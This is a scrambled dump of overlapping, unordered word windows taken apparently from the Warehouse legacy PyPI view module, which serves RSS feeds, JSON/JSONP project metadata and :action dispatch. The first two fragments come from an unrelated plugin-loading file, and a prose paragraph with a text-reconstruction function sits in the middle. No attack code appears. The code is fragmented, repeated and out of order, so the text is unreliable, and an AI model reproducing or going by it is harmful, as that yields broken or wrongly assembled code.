"not self.disabled: return for name in self.disabled: plugin.plugins[name].builtin = True log.debug('Enabled builtin plugin(s):",
"= True log.debug('Enabled builtin plugin(s): %s' % ', '.join(self.disabled)) self.disabled = [] on_task_abort"
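Each record in this dump is an unordered bag of fixed-width word windows taken at stride 1 from a single source file; the code above and below was recovered by chaining those windows on their shared overlaps. A minimal sketch of that reconstruction, assuming a constant window width and no repeated (n-1)-gram (function and variable names here are illustrative, not part of any library):

def reconstruct(shingles):
    # Rebuild a text from n-word windows taken at stride 1, assuming the
    # window width is constant and no (n-1)-gram occurs twice.
    windows = [tuple(s.split()) for s in shingles]
    n = len(windows[0])

    # Index every window by its first n-1 words.
    by_prefix = {w[:n - 1]: w for w in windows}

    # The opening window is the only one whose first n-1 words are no
    # other window's last n-1 words.
    suffixes = {w[1:] for w in windows}
    start = next(w for w in windows if w[:n - 1] not in suffixes)

    # Chain: each step appends the one word the successor window adds.
    out = list(start)
    nxt = by_prefix.get(tuple(out[-(n - 1):]))
    while nxt is not None:
        out.append(nxt[-1])
        nxt = by_prefix.get(tuple(out[-(n - 1):]))
    return ' '.join(out)

print(reconstruct(["a b c", "c d e", "b c d"]))  # -> a b c d e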
"url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request,",
"Most of the dispatch in legacy PyPI was implemented using a :action parameter",
"\"\"\" if name in _action_methods: raise KeyError('Attempt to re-register name %r' % (name,",
"KIND, either express or implied. # See the License for the specific language",
"name %r' % (name, )) def deco(fn): _action_methods[name] = fn return fn return",
"Unless required by applicable law or agreed to in writing, software # distributed",
"necessary if callback: data = '/**/ %s(%s);' % (callback, data) serial = app.db.packaging.get_last_serial()",
"response.headers.add(\"X-PyPI-Last-Serial\", serial) return response @register('rss') @cache(browser=1, varnish=120) @fastly.rss def rss(app, request): \"\"\"Dump the",
":action parameter in the GET or POST arguments. This doesn't actually decorate the",
"warehouse import fastly from warehouse.helpers import url_for from warehouse.http import Response from warehouse.legacy",
"handler for a legacy :action style dispatch. Most of the dispatch in legacy",
"_action_methods: raise KeyError('Attempt to re-register name %r' % (name, )) def deco(fn): _action_methods[name]",
"when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url)) response",
"specific language governing permissions and # limitations under the License. import json import",
"def deco(fn): _action_methods[name] = fn return fn return deco def pypi(app, request): #",
"using a :action parameter in the GET or POST arguments. This doesn't actually",
"return fn return deco def pypi(app, request): # check for the legacy :action-style",
"as an RSS feed. \"\"\" releases = app.db.packaging.get_recent_projects(num=40) for release in releases: #",
"raise KeyError('Attempt to re-register name %r' % (name, )) def deco(fn): _action_methods[name] =",
"= render_response( app, request, \"legacy/rss.xml\", description='package updates', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml;",
"response = Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return response @register('rss') @cache(browser=1,",
"name') # Get the real project name for this project project = app.db.packaging.get_project(project_name)",
"N days' updates as an RSS feed. \"\"\" releases = app.db.packaging.get_recently_updated(num=40) for release",
"callback: data = '/**/ %s(%s);' % (callback, data) serial = app.db.packaging.get_last_serial() response =",
"is invalid callback = request.args.get('callback') if callback: if not is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP",
"we redirect to where it # moved to return redirect( url_for( request, \"warehouse.views.index\",",
"this file except in compliance with the License. # You may obtain a",
"), code=301, ) def daytime(app, request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\")",
"if callback: if not is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP callback name') # Get the",
"to _external when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True)",
"is_valid_json_callback_name _action_methods = {} def register(name): \"\"\"Register a handler for a legacy :action",
"url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='new projects',",
"varnish=120) @fastly.rss def packages_rss(app, request): \"\"\"Dump the last N days' new projects as",
"a handler for a legacy :action style dispatch. Most of the dispatch in",
"<NAME> # # Licensed under the Apache License, Version 2.0 (the \"License\"); #",
"request, project_name, version=None): # fail early if callback is invalid callback = request.args.get('callback')",
"response.mimetype = 'text/xml; charset=utf-8' # TODO: throw in a last-modified header too? return",
"request, \"legacy/rss.xml\", description='new projects', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO:",
"ANY KIND, either express or implied. # See the License for the specific",
"for the latest version versions = app.db.packaging.get_project_versions(project['name']) if version is None: if not",
"def daytime(app, request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120)",
"project name for this project project = app.db.packaging.get_project(project_name) if project is None: raise",
"this project project = app.db.packaging.get_project(project_name) if project is None: raise NotFound(\"{} does not",
"def project_json(app, request, project_name, version=None): # fail early if callback is invalid callback",
"url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='package",
"= 'text/xml; charset=utf-8' # TODO: throw in a last-modified header too? return response",
"render_response( app, request, \"legacy/rss.xml\", description='new projects', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8'",
"request.args.get('callback') if callback: if not is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP callback name') # Get",
"NotFound(\"{} does not exist\".format(project_name)) # we're looking for the latest version versions =",
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See",
"return response @register('rss') @cache(browser=1, varnish=120) @fastly.rss def rss(app, request): \"\"\"Dump the last N",
"def rss(app, request): \"\"\"Dump the last N days' updates as an RSS feed.",
"of the dispatch in legacy PyPI was implemented using a :action parameter in",
"warehouse.helpers import url_for from warehouse.http import Response from warehouse.legacy import xmlrpc from warehouse.templates",
"app.db.packaging.get_project(project_name) if project is None: raise NotFound(\"{} does not exist\".format(project_name)) # we're looking",
"response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return response @register('rss') @cache(browser=1, varnish=120) @fastly.rss def rss(app,",
"url['upload_time'].strftime(time_format) data = json.dumps(d, sort_keys=True) # write the JSONP extra crap if necessary",
"IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or",
"response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def project_json(app,",
"data) serial = app.db.packaging.get_last_serial() response = Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial)",
"implemented using a :action parameter in the GET or POST arguments. This doesn't",
"= request.args.get(':action') if action in _action_methods: return _action_methods[action](app, request) # No :action means",
"request.args.get(':action') if action in _action_methods: return _action_methods[action](app, request) # No :action means we",
"\"\"\"Dump the last N days' new projects as an RSS feed. \"\"\" releases",
"OF ANY KIND, either express or implied. # See the License for the",
"version is None: if not versions: raise NotFound(\"{} has no releases\".format(project_name)) version =",
"= url['upload_time'].strftime(time_format) data = json.dumps(d, sort_keys=True) # write the JSONP extra crap if",
"request): \"\"\"Dump the last N days' updates as an RSS feed. \"\"\" releases",
"# Copyright 2013 <NAME> # # Licensed under the Apache License, Version 2.0",
"packages_rss(app, request): \"\"\"Dump the last N days' new projects as an RSS feed.",
"not exist\".format(project_name)) # we're looking for the latest version versions = app.db.packaging.get_project_versions(project['name']) if",
") response.mimetype = 'text/xml; charset=utf-8' # TODO: throw in a last-modified header too?",
"# TODO update _force_external to _external when Flask-ification is done url = url_for(request,",
"'%Y-%m-%dT%H:%M:%S' for url in d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format) for release, urls in d['releases'].items():",
"# moved to return redirect( url_for( request, \"warehouse.views.index\", ), code=301, ) def daytime(app,",
"it simply registers it with the legacy routing mapping. \"\"\" if name in",
"is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP callback name') # Get the real project name for",
"software # distributed under the License is distributed on an \"AS IS\" BASIS,",
"= xmlrpc.Interface(app, request) d = dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), ) time_format",
"the dispatch in legacy PyPI was implemented using a :action parameter in the",
"# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to",
"name for this project project = app.db.packaging.get_project(project_name) if project is None: raise NotFound(\"{}",
"if callback: data = '/**/ %s(%s);' % (callback, data) serial = app.db.packaging.get_last_serial() response",
") def daytime(app, request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\") @cors @cache(browser=1,",
"is None: if not versions: raise NotFound(\"{} has no releases\".format(project_name)) version = versions[0]",
"arguments. This doesn't actually decorate the function or alter it in any way,",
"request) d = dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), ) time_format = '%Y-%m-%dT%H:%M:%S'",
"under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES",
"legacy routing mapping. \"\"\" if name in _action_methods: raise KeyError('Attempt to re-register name",
"the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law",
"data = json.dumps(d, sort_keys=True) # write the JSONP extra crap if necessary if",
"project project = app.db.packaging.get_project(project_name) if project is None: raise NotFound(\"{} does not exist\".format(project_name))",
"app.db.packaging.get_recently_updated(num=40) for release in releases: # TODO update _force_external to _external when Flask-ification",
"\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express",
"serial) return response @register('rss') @cache(browser=1, varnish=120) @fastly.rss def rss(app, request): \"\"\"Dump the last",
"header too? return response @register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss def packages_rss(app, request): \"\"\"Dump the",
"_external when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url))",
"is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url)) response = render_response( app,",
"projects', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO: throw in a",
"from warehouse.legacy import xmlrpc from warehouse.templates import render_response from warehouse.utils import cache, cors,",
"required by applicable law or agreed to in writing, software # distributed under",
"'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='package updates',",
"version), releases=rpc.all_release_urls(project['name']), ) time_format = '%Y-%m-%dT%H:%M:%S' for url in d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format)",
"d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format) for release, urls in d['releases'].items(): for url in urls:",
"@register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss def packages_rss(app, request): \"\"\"Dump the last N days' new",
"if action in _action_methods: return _action_methods[action](app, request) # No :action means we render",
"applicable law or agreed to in writing, software # distributed under the License",
"the index, or at least we redirect to where it # moved to",
"# Get the real project name for this project project = app.db.packaging.get_project(project_name) if",
"a :action parameter in the GET or POST arguments. This doesn't actually decorate",
"index, or at least we redirect to where it # moved to return",
"looking for the latest version versions = app.db.packaging.get_project_versions(project['name']) if version is None: if",
"or agreed to in writing, software # distributed under the License is distributed",
"last N days' new projects as an RSS feed. \"\"\" releases = app.db.packaging.get_recent_projects(num=40)",
"= {} def register(name): \"\"\"Register a handler for a legacy :action style dispatch.",
")) def deco(fn): _action_methods[name] = fn return fn return deco def pypi(app, request):",
"means we render the index, or at least we redirect to where it",
"CONDITIONS OF ANY KIND, either express or implied. # See the License for",
"alter it in any way, it simply registers it with the legacy routing",
"callback: if not is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP callback name') # Get the real",
"# we're looking for the latest version versions = app.db.packaging.get_project_versions(project['name']) if version is",
"the last N days' updates as an RSS feed. \"\"\" releases = app.db.packaging.get_recently_updated(num=40)",
"d = dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), ) time_format = '%Y-%m-%dT%H:%M:%S' for",
"under the Apache License, Version 2.0 (the \"License\"); # you may not use",
"writing, software # distributed under the License is distributed on an \"AS IS\"",
"versions = app.db.packaging.get_project_versions(project['name']) if version is None: if not versions: raise NotFound(\"{} has",
"You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #",
"def packages_rss(app, request): \"\"\"Dump the last N days' new projects as an RSS",
"License. # You may obtain a copy of the License at # #",
"= versions[0] elif version not in versions: raise NotFound(\"{} has no release {}\".format(project_name,",
"<filename>warehouse/legacy/pypi.py # Copyright 2013 <NAME> # # Licensed under the Apache License, Version",
"NotFound(\"{} has no releases\".format(project_name)) version = versions[0] elif version not in versions: raise",
"info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), ) time_format = '%Y-%m-%dT%H:%M:%S' for url in d['urls']:",
"if project is None: raise NotFound(\"{} does not exist\".format(project_name)) # we're looking for",
"return redirect( url_for( request, \"warehouse.views.index\", ), code=301, ) def daytime(app, request): response =",
"JSONP callback name') # Get the real project name for this project project",
"= Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return response @register('rss') @cache(browser=1, varnish=120)",
"render_response( app, request, \"legacy/rss.xml\", description='package updates', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8'",
"compliance with the License. # You may obtain a copy of the License",
"= json.dumps(d, sort_keys=True) # write the JSONP extra crap if necessary if callback:",
"way, it simply registers it with the legacy routing mapping. \"\"\" if name",
"url in urls: url['upload_time'] = url['upload_time'].strftime(time_format) data = json.dumps(d, sort_keys=True) # write the",
"import fastly from warehouse.helpers import url_for from warehouse.http import Response from warehouse.legacy import",
"deco def pypi(app, request): # check for the legacy :action-style dispatch action =",
"for the specific language governing permissions and # limitations under the License. import",
"legacy PyPI was implemented using a :action parameter in the GET or POST",
"None: raise NotFound(\"{} does not exist\".format(project_name)) # we're looking for the latest version",
"= '/**/ %s(%s);' % (callback, data) serial = app.db.packaging.get_last_serial() response = Response(data, mimetype=\"application/json\")",
"of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable",
"response = render_response( app, request, \"legacy/rss.xml\", description='new projects', releases=releases, site=app.config.site, ) response.mimetype =",
"we render the index, or at least we redirect to where it #",
"projects as an RSS feed. \"\"\" releases = app.db.packaging.get_recent_projects(num=40) for release in releases:",
"\"\"\" releases = app.db.packaging.get_recent_projects(num=40) for release in releases: # TODO update _force_external to",
"Copyright 2013 <NAME> # # Licensed under the Apache License, Version 2.0 (the",
"with the legacy routing mapping. \"\"\" if name in _action_methods: raise KeyError('Attempt to",
"'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='new projects', releases=releases,",
"release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='package updates', releases=releases, site=app.config.site, ) response.mimetype",
"early if callback is invalid callback = request.args.get('callback') if callback: if not is_valid_json_callback_name(callback):",
"project_json(app, request, project_name, version=None): # fail early if callback is invalid callback =",
"redirect to where it # moved to return redirect( url_for( request, \"warehouse.views.index\", ),",
"not use this file except in compliance with the License. # You may",
"it # moved to return redirect( url_for( request, \"warehouse.views.index\", ), code=301, ) def",
"permissions and # limitations under the License. import json import time from werkzeug.utils",
"has no releases\".format(project_name)) version = versions[0] elif version not in versions: raise NotFound(\"{}",
"License, Version 2.0 (the \"License\"); # you may not use this file except",
"deco(fn): _action_methods[name] = fn return fn return deco def pypi(app, request): # check",
"time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def project_json(app, request, project_name,",
"not is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP callback name') # Get the real project name",
"distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY",
"language governing permissions and # limitations under the License. import json import time",
"daytime(app, request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\")",
"= url['upload_time'].strftime(time_format) for release, urls in d['releases'].items(): for url in urls: url['upload_time'] =",
"last N days' updates as an RSS feed. \"\"\" releases = app.db.packaging.get_recently_updated(num=40) for",
"xmlrpc.Interface(app, request) d = dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), ) time_format =",
"version)) rpc = xmlrpc.Interface(app, request) d = dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']),",
"serial = app.db.packaging.get_last_serial() response = Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return",
"# you may not use this file except in compliance with the License.",
"was implemented using a :action parameter in the GET or POST arguments. This",
"agreed to in writing, software # distributed under the License is distributed on",
"This doesn't actually decorate the function or alter it in any way, it",
"_force_external to _external when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True)",
"check for the legacy :action-style dispatch action = request.args.get(':action') if action in _action_methods:",
"version=None): # fail early if callback is invalid callback = request.args.get('callback') if callback:",
"urls in d['releases'].items(): for url in urls: url['upload_time'] = url['upload_time'].strftime(time_format) data = json.dumps(d,",
"= url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\",",
"redirect( url_for( request, \"warehouse.views.index\", ), code=301, ) def daytime(app, request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\",",
"(the \"License\"); # you may not use this file except in compliance with",
"a last-modified header too? return response @register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss def packages_rss(app, request):",
"the legacy :action-style dispatch action = request.args.get(':action') if action in _action_methods: return _action_methods[action](app,",
"data = '/**/ %s(%s);' % (callback, data) serial = app.db.packaging.get_last_serial() response = Response(data,",
"action = request.args.get(':action') if action in _action_methods: return _action_methods[action](app, request) # No :action",
"# check for the legacy :action-style dispatch action = request.args.get(':action') if action in",
"the legacy routing mapping. \"\"\" if name in _action_methods: raise KeyError('Attempt to re-register",
"project_name=release['name'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='new projects', releases=releases, site=app.config.site,",
"site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO: throw in a last-modified header",
"# Unless required by applicable law or agreed to in writing, software #",
"warehouse.utils import cache, cors, is_valid_json_callback_name _action_methods = {} def register(name): \"\"\"Register a handler",
"version not in versions: raise NotFound(\"{} has no release {}\".format(project_name, version)) rpc =",
"by applicable law or agreed to in writing, software # distributed under the",
"copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by",
"return Response(response, mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def project_json(app, request, project_name, version=None): #",
"exist\".format(project_name)) # we're looking for the latest version versions = app.db.packaging.get_project_versions(project['name']) if version",
"releases = app.db.packaging.get_recently_updated(num=40) for release in releases: # TODO update _force_external to _external",
"crap if necessary if callback: data = '/**/ %s(%s);' % (callback, data) serial",
"the last N days' new projects as an RSS feed. \"\"\" releases =",
"License. import json import time from werkzeug.utils import redirect from werkzeug.exceptions import NotFound,",
"rss(app, request): \"\"\"Dump the last N days' updates as an RSS feed. \"\"\"",
"and # limitations under the License. import json import time from werkzeug.utils import",
"feed. \"\"\" releases = app.db.packaging.get_recently_updated(num=40) for release in releases: # TODO update _force_external",
"is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url)) response = render_response(",
"from warehouse.helpers import url_for from warehouse.http import Response from warehouse.legacy import xmlrpc from",
"app, request, \"legacy/rss.xml\", description='package updates', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' #",
"version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), ) time_format = '%Y-%m-%dT%H:%M:%S' for url in d['urls']: url['upload_time']",
"file except in compliance with the License. # You may obtain a copy",
"if necessary if callback: data = '/**/ %s(%s);' % (callback, data) serial =",
"versions[0] elif version not in versions: raise NotFound(\"{} has no release {}\".format(project_name, version))",
") time_format = '%Y-%m-%dT%H:%M:%S' for url in d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format) for release,",
"for release, urls in d['releases'].items(): for url in urls: url['upload_time'] = url['upload_time'].strftime(time_format) data",
"# TODO: throw in a last-modified header too? return response @register('packages_rss') @cache(browser=1, varnish=120)",
"_force_external to _external when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'],",
"the License. import json import time from werkzeug.utils import redirect from werkzeug.exceptions import",
"_force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='package updates', releases=releases, site=app.config.site, )",
"License for the specific language governing permissions and # limitations under the License.",
"or POST arguments. This doesn't actually decorate the function or alter it in",
"versions: raise NotFound(\"{} has no releases\".format(project_name)) version = versions[0] elif version not in",
"{}\".format(project_name, version)) rpc = xmlrpc.Interface(app, request) d = dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version),",
"d['releases'].items(): for url in urls: url['upload_time'] = url['upload_time'].strftime(time_format) data = json.dumps(d, sort_keys=True) #",
"to in writing, software # distributed under the License is distributed on an",
"Response from warehouse.legacy import xmlrpc from warehouse.templates import render_response from warehouse.utils import cache,",
"implied. # See the License for the specific language governing permissions and #",
"\"License\"); # you may not use this file except in compliance with the",
"if not is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP callback name') # Get the real project",
"obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless",
"in _action_methods: raise KeyError('Attempt to re-register name %r' % (name, )) def deco(fn):",
"routing mapping. \"\"\" if name in _action_methods: raise KeyError('Attempt to re-register name %r'",
"(callback, data) serial = app.db.packaging.get_last_serial() response = Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\",",
"releases: # TODO update _force_external to _external when Flask-ification is done url =",
"actually decorate the function or alter it in any way, it simply registers",
"project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='package updates', releases=releases,",
"versions: raise NotFound(\"{} has no release {}\".format(project_name, version)) rpc = xmlrpc.Interface(app, request) d",
"the real project name for this project project = app.db.packaging.get_project(project_name) if project is",
"request): \"\"\"Dump the last N days' new projects as an RSS feed. \"\"\"",
"or implied. # See the License for the specific language governing permissions and",
"# No :action means we render the index, or at least we redirect",
"Response(response, mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def project_json(app, request, project_name, version=None): # fail",
"throw in a last-modified header too? return response @register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss def",
"Apache License, Version 2.0 (the \"License\"); # you may not use this file",
"No :action means we render the index, or at least we redirect to",
"OR CONDITIONS OF ANY KIND, either express or implied. # See the License",
"may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #",
"\"legacy/rss.xml\", description='package updates', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO: throw",
"time from werkzeug.utils import redirect from werkzeug.exceptions import NotFound, BadRequest from warehouse import",
"last-modified header too? return response @register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss def packages_rss(app, request): \"\"\"Dump",
"http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,",
"from werkzeug.utils import redirect from werkzeug.exceptions import NotFound, BadRequest from warehouse import fastly",
"in writing, software # distributed under the License is distributed on an \"AS",
"\"\"\" releases = app.db.packaging.get_recently_updated(num=40) for release in releases: # TODO update _force_external to",
"for a legacy :action style dispatch. Most of the dispatch in legacy PyPI",
"POST arguments. This doesn't actually decorate the function or alter it in any",
"= app.db.packaging.get_project(project_name) if project is None: raise NotFound(\"{} does not exist\".format(project_name)) # we're",
"for release in releases: # TODO update _force_external to _external when Flask-ification is",
"real project name for this project project = app.db.packaging.get_project(project_name) if project is None:",
"# See the License for the specific language governing permissions and # limitations",
"the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR",
"description='package updates', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO: throw in",
"charset=utf-8' # TODO: throw in a last-modified header too? return response @register('packages_rss') @cache(browser=1,",
"is None: raise NotFound(\"{} does not exist\".format(project_name)) # we're looking for the latest",
"in d['releases'].items(): for url in urls: url['upload_time'] = url['upload_time'].strftime(time_format) data = json.dumps(d, sort_keys=True)",
"Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url)) response = render_response(",
"_force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='new projects', releases=releases, site=app.config.site, )",
"from warehouse.utils import cache, cors, is_valid_json_callback_name _action_methods = {} def register(name): \"\"\"Register a",
"app.db.packaging.get_recent_projects(num=40) for release in releases: # TODO update _force_external to _external when Flask-ification",
"url['upload_time'].strftime(time_format) for release, urls in d['releases'].items(): for url in urls: url['upload_time'] = url['upload_time'].strftime(time_format)",
"# write the JSONP extra crap if necessary if callback: data = '/**/",
"json import time from werkzeug.utils import redirect from werkzeug.exceptions import NotFound, BadRequest from",
"latest version versions = app.db.packaging.get_project_versions(project['name']) if version is None: if not versions: raise",
"BadRequest from warehouse import fastly from warehouse.helpers import url_for from warehouse.http import Response",
"from warehouse import fastly from warehouse.helpers import url_for from warehouse.http import Response from",
"warehouse.legacy import xmlrpc from warehouse.templates import render_response from warehouse.utils import cache, cors, is_valid_json_callback_name",
"= app.db.packaging.get_project_versions(project['name']) if version is None: if not versions: raise NotFound(\"{} has no",
"TODO update _force_external to _external when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail',",
"the Apache License, Version 2.0 (the \"License\"); # you may not use this",
"request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def",
"you may not use this file except in compliance with the License. #",
"registers it with the legacy routing mapping. \"\"\" if name in _action_methods: raise",
"= fn return fn return deco def pypi(app, request): # check for the",
"mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return response @register('rss') @cache(browser=1, varnish=120) @fastly.rss def",
"update _force_external to _external when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'],",
"warehouse.http import Response from warehouse.legacy import xmlrpc from warehouse.templates import render_response from warehouse.utils",
"import json import time from werkzeug.utils import redirect from werkzeug.exceptions import NotFound, BadRequest",
"decorate the function or alter it in any way, it simply registers it",
"in urls: url['upload_time'] = url['upload_time'].strftime(time_format) data = json.dumps(d, sort_keys=True) # write the JSONP",
"in any way, it simply registers it with the legacy routing mapping. \"\"\"",
"use this file except in compliance with the License. # You may obtain",
"request) # No :action means we render the index, or at least we",
"request, \"warehouse.views.index\", ), code=301, ) def daytime(app, request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return",
"at least we redirect to where it # moved to return redirect( url_for(",
"version = versions[0] elif version not in versions: raise NotFound(\"{} has no release",
"releases=rpc.all_release_urls(project['name']), ) time_format = '%Y-%m-%dT%H:%M:%S' for url in d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format) for",
"KeyError('Attempt to re-register name %r' % (name, )) def deco(fn): _action_methods[name] = fn",
"app.db.packaging.get_last_serial() response = Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return response @register('rss')",
"url in d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format) for release, urls in d['releases'].items(): for url",
"when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url)) response =",
"releases\".format(project_name)) version = versions[0] elif version not in versions: raise NotFound(\"{} has no",
"= app.db.packaging.get_last_serial() response = Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return response",
"# Licensed under the Apache License, Version 2.0 (the \"License\"); # you may",
"sort_keys=True) # write the JSONP extra crap if necessary if callback: data =",
"moved to return redirect( url_for( request, \"warehouse.views.index\", ), code=301, ) def daytime(app, request):",
"import NotFound, BadRequest from warehouse import fastly from warehouse.helpers import url_for from warehouse.http",
"if name in _action_methods: raise KeyError('Attempt to re-register name %r' % (name, ))",
"name in _action_methods: raise KeyError('Attempt to re-register name %r' % (name, )) def",
"for url in d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format) for release, urls in d['releases'].items(): for",
